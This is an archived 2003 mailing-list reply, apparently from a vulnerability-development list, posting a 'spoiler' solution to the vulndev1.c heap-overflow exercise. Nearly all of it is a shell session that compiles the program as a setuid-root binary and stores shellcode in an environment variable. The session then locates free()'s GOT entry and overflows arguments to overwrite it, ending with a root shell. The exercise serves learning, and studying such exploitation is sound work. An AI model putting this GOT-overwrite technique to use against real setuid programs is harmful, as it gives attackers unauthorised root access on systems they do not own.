
Re: vulndev1.c solution (warning SPOILER)

From: Kenji Cronos <matrix(at)phiral.com>
Date: Thu May 15 2003 - 12:35:27 EDT

On Wed, 14 May 2003 16:48:33 -0700
"Cameron Brown" <cameron@greyzone.com> wrote:

> Jon,
>
> I don't know about yours, but my version of free() (glibc-2.2.93)

Yup, you're right.. I tried doing the same thing on a different system and ran into that problem... had to put a jump in there.. I guess I just got lucky on my laptop the first time.. also, when exploiting on the command line.. \x0c can screw things up since it's the form feed character.. so here I just jumped over a little bit more..

matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c
matrix@overdose vuln-dev $ sudo chown root.root vuln1
matrix@overdose vuln-dev $ sudo chmod +s vuln1
matrix@overdose vuln-dev $ export SMEGMA=`printf "\xeb\x0e"`AAAAAAAAAAAAAAAAAA`cat shell`
matrix@overdose vuln-dev $ echo 'main(){printf("%p\n",getenv("SMEGMA"));}'>q.c;gcc -o q.ert q.c;./q.ert;rm q.*
0xbffffa04
matrix@overdose vuln-dev $ objdump -R ./vuln1 | grep free
080495f8 R_386_JUMP_SLOT   free
matrix@overdose vuln-dev $ pcalc 0xf8-12
        236             0xec            0y11101100
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x253;'` `printf "\xec\x95\x04\x08\x04\xfa\xff\xbf";`
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b#


Received on Thu May 15 13:31:33 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT
